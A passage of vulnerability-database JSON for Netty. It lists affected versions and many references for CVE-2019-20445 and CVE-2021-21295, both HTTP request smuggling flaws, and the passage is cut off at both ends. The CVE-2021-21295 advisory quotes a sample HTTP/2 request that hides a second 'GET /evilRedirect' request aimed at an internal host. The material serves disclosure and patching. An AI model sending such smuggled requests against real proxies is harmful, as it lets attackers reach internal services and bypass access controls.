"3.9.9.Final", "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8" ], "database_specific": { "last_known_affected_version_range": "\u003c 
4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-p2v9-g2qv-p635/GHSA-p2v9-g2qv-p635.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-20445" }, { "type": "WEB", "url": "https://github.com/netty/netty/issues/9861" }, { "type": "WEB", "url": "https://github.com/netty/netty/pull/9865" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rce71d33747010d32d31d90f5d737dae26291d96552f513a266c92fbb@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbdb59c683d666130906a9c05a1d2b034c4cc08cda7ed41322bd54fe2@%3Cissues.flume.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb84c57670ec48ef23f4d07973b7fa69f629b8e7fcfb48874362feb6f@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb5c065e7bd701b0744f9f28ad769943f91745102716c1eb516325f11@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raaac04b7567c554786132144bea3dcb72568edd410c1e6f0101742e7@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra9fbfe7d4830ae675bf34c7c0f8c22fc8a4099f65706c1bc4f54c593@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra2ace4bcb5cf487f72cbcbfa0f8cc08e755ec2b93d7e69f276148b08@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra1a71b576a45426af5ee65255be9596ff3181a342f4ba73b800db78f@%3Cdev.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9b20cdac704cf9a583400350e2d5b576fa8417c18ddb961201676c60@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r96e08f929234e8ba1ef4a93a0fd2870f535a1f9ab628fabc46115986@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r959474dcf7f88565ed89f6252ca5a274419006cb71348f14764b183d@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r832724df393a7ef25ca4c7c2eb83ad2d6c21c74569acda5233f9f1ec@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0497" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd8f72411fb75b98d366400ae789966373b5c3eb3f511e717caf3e49e@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdb69125652311d0c41f6066ff44072a3642cf33a4b5e3c4f9c1ec9c2@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re45ee9256d3233c31d78e59ee59c7dc841c7fbd83d0769285b41e948@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf5b2dfb7401666a19915f8eaef3ba9f5c3386e2066fcd2ae66e16a2f@%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfb55f245b08d8a6ec0fb4dc159022227cd22de34c4419c2fbb18802b@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rff210a24f3a924829790e69eaefa84820902b7b31f17c3bf2def9114@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00017.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00018.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00003.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00004.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TS6VX7OMXPDJIU5LRGUAHRK6MENAVJ46" }, 
{ "type": "WEB", "url": "https://usn.ubuntu.com/4532-1" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4885" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0567" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0601" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0605" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0606" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0804" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0805" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0806" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0811" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" }, { "type": "WEB", "url": "https://github.com/netty/netty/compare/netty-4.1.43.Final...netty-4.1.44.Final" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r030beff88aeb6d7a2d6cd21342bd18686153ce6e26a4171d0e035663@%3Cissues.flume.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1fcccf8bdb3531c28bc9aa605a6a1bea7e68cef6fc12e01faafb2fb5@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r205937c85817a911b0c72655c2377e7a2c9322d6ef6ce1b118d34d8d@%3Cdev.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2f2989b7815d809ff3fda8ce330f553e5f133505afd04ffbc135f35f@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r310d2ce22304d5298ff87f10134f918c87919b452734f9841d95682d@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r36fcf538b28f2029e8b4f6b9a772f3b107913a78f09b095c5b153a62@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r46f93de62b1e199f3f9babb18128681677c53493546f532ed88c359d@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4d3f1d3e333d9c2b2f6e6ae8ed8750d4de03410ac294bcd12c7eefa3@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4ff40646e9ccce13560458419accdfc227b8b6ca4ead3a8a91decc74@%3Cissues.flume.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r640eb9b3213058a963e18291f903fc1584e577f60035f941e32f760a@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6945f3c346b7af89bbd3526a7c9b705b1e3569070ebcd0964bcedd7d@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r70b1ff22ee80e8101805b9a473116dd33265709007d2deb6f8c80bf2@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7790b9d99696d9eddce8a8c96f13bb68460984294ea6fea3800143e4@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r804895eedd72c9ec67898286eb185e04df852b0dd5fe53cf5b6138f9@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r81700644754e66ffea465c869cb477de25f8041e21598e8818fc2c45@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r819aaeb9944bdcfca438dcc51f05650dc728daf64dfd7d774fc2499b@%3Ccommits.zookeeper.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2020-02-20T20:54:25Z", "nvd_published_at": "2020-01-29T21:15:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-wm47-8v5p-wjpj", "published": "2021-03-09T18:49:49Z", 
"modified": "2025-01-14T08:57:03.544654Z", "aliases": [ "BIT-zookeeper-2021-21295", "CVE-2021-21295" ], "related": [ "CGA-3q34-9hpp-p3gf", "CGA-xh32-h668-455p", "CVE-2021-21295", "CVE-2021-21409" ], "summary": "Possible request smuggling in HTTP/2 due missing validation", "details": "### Impact\nIf a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1.\nIf the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) via `Http2StreamFrameToHttpObjectCodec `and then sent up to the child channel's pipeline and proxied through a remote peer as HTTP/1.1 this may result in request smuggling. \n\nIn a proxy case, users may assume the content-length is validated somehow, which is not the case. If the request is forwarded to a backend channel that is a HTTP/1.1 connection, the Content-Length now has meaning and needs to be checked.\n\nAn attacker can smuggle requests inside the body as it gets downgraded from HTTP/2 to HTTP/1.1. 
A sample attack request looks like:\n\n```\nPOST / HTTP/2\n:authority:: externaldomain.com\nContent-Length: 4\n\nasdfGET /evilRedirect HTTP/1.1\nHost: internaldomain.com\n```\n\nUsers are only affected if all of this is `true`:\n * `HTTP2MultiplexCodec` or `Http2FrameCodec` is used\n * `Http2StreamFrameToHttpObjectCodec` is used to convert to HTTP/1.1 objects\n * These HTTP/1.1 objects are forwarded to another remote peer.\n \n\n### Patches\nThis has been patched in 4.1.60.Final\n\n### Workarounds\nThe user can do the validation by themselves by implementing a custom `ChannelInboundHandler` that is put in the `ChannelPipeline` behind `Http2StreamFrameToHttpObjectCodec`.\n\n### References\nRelated change to workaround the problem: https://github.com/Netflix/zuul/pull/980 ", "affected": [ { "package": { "name": "io.netty:netty-codec-http2", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-codec-http2" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.1.60.Final" } ] } ], "versions": [ "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.11.Final", "4.1.12.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", "4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.44.Final", "4.1.45.Final", "4.1.46.Final", "4.1.47.Final", "4.1.48.Final", "4.1.49.Final", "4.1.5.Final", "4.1.50.Final", "4.1.51.Final", "4.1.52.Final", 
"4.1.53.Final", "4.1.54.Final", "4.1.55.Final", "4.1.56.Final", "4.1.57.Final", "4.1.58.Final", "4.1.59.Final", "4.1.6.Final", "4.1.7.Final", "4.1.8.Final", "4.1.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-wm47-8v5p-wjpj/GHSA-wm47-8v5p-wjpj.json" } }, { "package": { "name": "org.jboss.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/org.jboss.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.0.0.CR1", "3.0.0.CR2", "3.0.0.CR3", "3.0.0.CR4", "3.0.0.CR5", "3.0.0.GA", "3.0.1.GA", "3.0.2.GA", "3.1.0.ALPHA1", "3.1.0.ALPHA2", "3.1.0.ALPHA3", "3.1.0.ALPHA4", "3.1.0.BETA1", "3.1.0.BETA2", "3.1.0.BETA3", "3.1.0.CR1", "3.1.0.GA", "3.1.1.GA", "3.1.2.GA", "3.1.3.GA", "3.1.4.GA", "3.1.5.GA", "3.2.0.ALPHA1", "3.2.0.ALPHA2", "3.2.0.ALPHA3", "3.2.0.ALPHA4", "3.2.0.BETA1", "3.2.0.CR1", "3.2.0.Final", "3.2.1.Final", "3.2.10.Final", "3.2.2.Final", "3.2.3.Final", "3.2.4.Final", "3.2.5.Final", "3.2.6.Final", "3.2.7.Final", "3.2.8.Final", "3.2.9.Final" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-wm47-8v5p-wjpj/GHSA-wm47-8v5p-wjpj.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.10.0.Final", "3.10.1.Final", "3.10.2.Final", "3.10.3.Final", "3.10.4.Final", "3.10.5.Final", "3.10.6.Final", "3.3.0.Final", "3.3.1.Final", "3.4.0.Alpha1", "3.4.0.Alpha2", "3.4.0.Beta1", "3.4.0.Final", "3.4.1.Final", "3.4.2.Final", "3.4.3.Final", "3.4.4.Final", "3.4.5.Final", "3.4.6.Final", "3.5.0.Beta1", "3.5.0.Final", "3.5.1.Final", "3.5.10.Final", "3.5.11.Final", "3.5.12.Final", "3.5.13.Final", "3.5.2.Final", "3.5.3.Final", "3.5.4.Final", "3.5.5.Final", 
"3.5.6.Final", "3.5.7.Final", "3.5.8.Final", "3.5.9.Final", "3.6.0.Beta1", "3.6.0.Final", "3.6.1.Final", "3.6.10.Final", "3.6.2.Final", "3.6.3.Final", "3.6.4.Final", "3.6.5.Final", "3.6.6.Final", "3.6.7.Final", "3.6.8.Final", "3.6.9.Final", "3.7.0.Final", "3.7.1.Final", "3.8.0.Final", "3.8.1.Final", "3.8.2.Final", "3.8.3.Final", "3.9.0.Final", "3.9.1.1.Final", "3.9.1.Final", "3.9.2.Final", "3.9.3.Final", "3.9.4.Final", "3.9.5.Final", "3.9.6.Final", "3.9.7.Final", "3.9.8.Final", "3.9.9.Final", "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-wm47-8v5p-wjpj/GHSA-wm47-8v5p-wjpj.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21295" }, { "type": "WEB", "url": "https://github.com/Netflix/zuul/pull/980" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/89c241e3b1795ff257af4ad6eadc616cb2fb3dc4" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc73b8dd01b1be276d06bdf07883ecd93fe1a01f139a99ef30ba4308c@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc165e36ca7cb5417aec3f21bbc4ec00fb38ecebdd96a82cfab9bd56f@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc0087125cb15b4b78e44000f841cd37fefedfda942fd7ddf3ad1b528@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbed09768f496244a2e138dbbe6d2847ddf796c9c8ef9e50f2e3e30d9@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rbadcbcb50195f00bbd196403865ced521ca70787999583c07be38d0e@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb95d42ce220ed4a4683aa17833b5006d657bc4254bc5cb03cd5e6bfb@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb592033a2462548d061a83ac9449c5ff66098751748fcd1e2d008233@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb523bb6c60196c5f58514b86a8585c2069a4852039b45de3818b29d2@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb51d6202ff1a773f96eaa694b7da4ad3f44922c40b3d4e1a19c2f325@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb06c1e766aa45ee422e8261a8249b561784186483e8f742ea627bda4@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rae198f44c3f7ac5264045e6ba976be1703cff38dcf1609916e50210d@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/racc191a1f70a4f13155e8002c61bddef2870b26441971c697436ad5d@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra96c74c37ed7252f78392e1ad16442bd16ae72a4d6c8db50dd55c88b@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra83096bcbfe6e1f4d54449f8a013117a0536404e9d307ab4a0d34f81@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra655e5cec74d1ddf62adacb71d398abd96f3ea2c588f6bbf048348eb@%3Cissues.kudu.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra64d56a8a331ffd7bdcd24a9aaaeeedeacd5d639f5a683389123f898@%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r9924ef9357537722b28d04c98a189750b80694a19754e5057c34ca48@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r96ce18044880c33634c4b3fcecc57b8b90673c9364d63eba00385523@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r905b92099998291956eebf4f1c5d95f5a0cbcece2946cc46d32274fd@%3Cdev.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9051e4f484a970b5566dc1870ecd9c1eb435214e2652cf3ea4d0c0cc@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8db1d7b3b9acc9e8d2776395e280eb9615dd7790e1da8c57039963de@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8bcaf7821247b1836b10f6a1a3a3212b06272fd4cde4a859de1b78cf@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4885" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210604-0003" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfff6ff8ffb31e8a32619c79774def44b6ffbb037c128c5ad3eab7171@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf934292a4a1c189827f625d567838d2c1001e4739b158638d844105b@%3Cissues.kudu.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf87b870a22aa5c77c27900967b518a71a7d954c2952860fce3794b60@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf36f1114e84a3379b20587063686148e2d5a39abc0b8a66ff2a9087a@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/reafc834062486adfc7be5bb8f7b7793be0d33f483678a094c3f9d468@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/re7c69756a102bebce8b8681882844a53e2f23975a189363e68ad0324@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re6207ebe2ca4d44f2a6deee695ad6f27fd29d78980f1d46ed1574f91@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re4f70b62843e92163fab03b65e2aa8078693293a0c36f1cc260079ed@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rddbb4f8d5db23265bb63d14ef4b3723b438abc1589f877db11d35450@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdc096e13ac4501ea2e2b03a197682a313b85d3d3ec89d5ae5551b384@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdb4db3f5a9c478ca52a7b164680b88877a5a9c174e7047676c006b2c@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd8f72411fb75b98d366400ae789966373b5c3eb3f511e717caf3e49e@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd4a6b7dec38ea6cd28b6f94bd4b312629a52b80be3786d5fb0e474bc@%3Cissues.kudu.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd25c88aad0e76240dd09f0eb34bdab924933946429e068a167adcb73@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcfc535afd413d9934d6ee509dce234dac41fa3747a7555befb17447e@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcfc154eb2de23d2dc08a56100341161e1a40a8ea86c693735437e8f2@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcf3752209a8b04996373bf57fdc808b3bfaa2be8702698a0323641f8@%3Ccommits.hbase.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rcd163e421273e8dca1c71ea298dce3dd11b41d51c3a812e0394e6a5d@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca0978b634a0c3ebee4126ec29c7f570b165fae3f8f3658754c1cbd3@%3Cissues.kudu.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r86cd38a825ab2344f3e6cad570528852f29a4ffdf56ab67d75c36edf@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3ff9e735ca33612d900607dc139ebd38a64cadc6bce292e53eb86d7f@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3c4596b9b37f5ae91628ccf169d33cd5a0da4b16b6c39d5bad8e03f3@%3Cdev.jackrabbit.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3c293431c781696681abbfe1c573c2d9dcdae6fd3ff330ea22f0433f@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r393a339ab0b63ef9e6502253eeab26e7643b3e69738d5948b2b1d064@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r33eb06b05afbc7df28d31055cae0cb3fd36cab808c884bf6d680bea5@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r32b0b640ad2be3b858f0af51c68a7d5c5a66a462c8bbb93699825cd3@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r312ce5bd3c6bf08c138349b507b6f1c25fe9cf40b6f2b0014c9d12b1@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2e93ce23e04c3f0a61e987d1111d0695cb668ac4ec4edbf237bd3e80@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2936730ef0a06e724b96539bc7eacfcd3628987c16b1b99c790e7b87@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r27b7e5a588ec826b15f38c40be500c50073400019ce7b8adfd07fece@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r268850f26639ebe249356ed6d8edb54ee8943be6f200f770784fb190@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r22b2f34447d71c9a0ad9079b7860323d5584fb9b40eb42668c21eaf1@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r22adb45fe902aeafcd0a1c4db13984224a667676c323c66db3af38a1@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1bca0b81193b74a451fc6d687ab58ef3a1f5ec40f6c61561d8dd9509@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1908a34b9cc7120e5c19968a116ddbcffea5e9deb76c2be4fa461904@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r16c4b55ac82be72f28adad4f8061477e5f978199d5725691dcc82c24@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r15f66ada9a5faf4bac69d9e7c4521cedfefa62df9509881603791969@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0b09f3e31e004fe583f677f7afa46bd30110904576c13c5ac818ac2c@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r04a3e0d9f53421fb946c60cc54762b7151dc692eb4e39970a7579052@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r040a5e4d9cca2f98354b58a70b27099672276f66995c4e2e39545d0b@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r02e467123d45006a1dda20a38349e9c74c3a4b53e2e07be0939ecb3f@%3Cdev.ranger.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r855b4b6814ac829ce2d48dd9d8138d07f33387e710de798ee92c011e@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r837bbcbf12e335e83ab448b1bd2c1ad7e86efdc14034b23811422e6a@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7bb3cdc192e9a6f863d3ea05422f09fa1ae2b88d4663e63696ee7ef5@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r790c2926efcd062067eb18fde2486527596d7275381cfaff2f7b3890@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r70cebada51bc6d49138272437d8a28fe971d0197334ef906b575044c@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6d32fc3cd547f7c9a288a57c7f525f5d00a00d5d163613e0d10a23ef@%3Ccommits.servicecomb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6aee7e3566cb3e51eeed2fd8786704d91f80a7581e00a787ba9f37f6@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6a29316d758db628a1df49ca219d64caf493999b52cc77847bfba675@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6a122c25e352eb134d01e7f4fc4d345a491c5ee9453fef6fc754d15b@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r67e6a636cbc1958383a1cd72b7fd0cd7493360b1dd0e6c12f5761798@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r67c4f90658fde875521c949448c54c98517beecdc7f618f902c620ec@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r602e98daacc98934f097f07f2eed6eb07c18bfc1949c8489dc7bfcf5@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": 
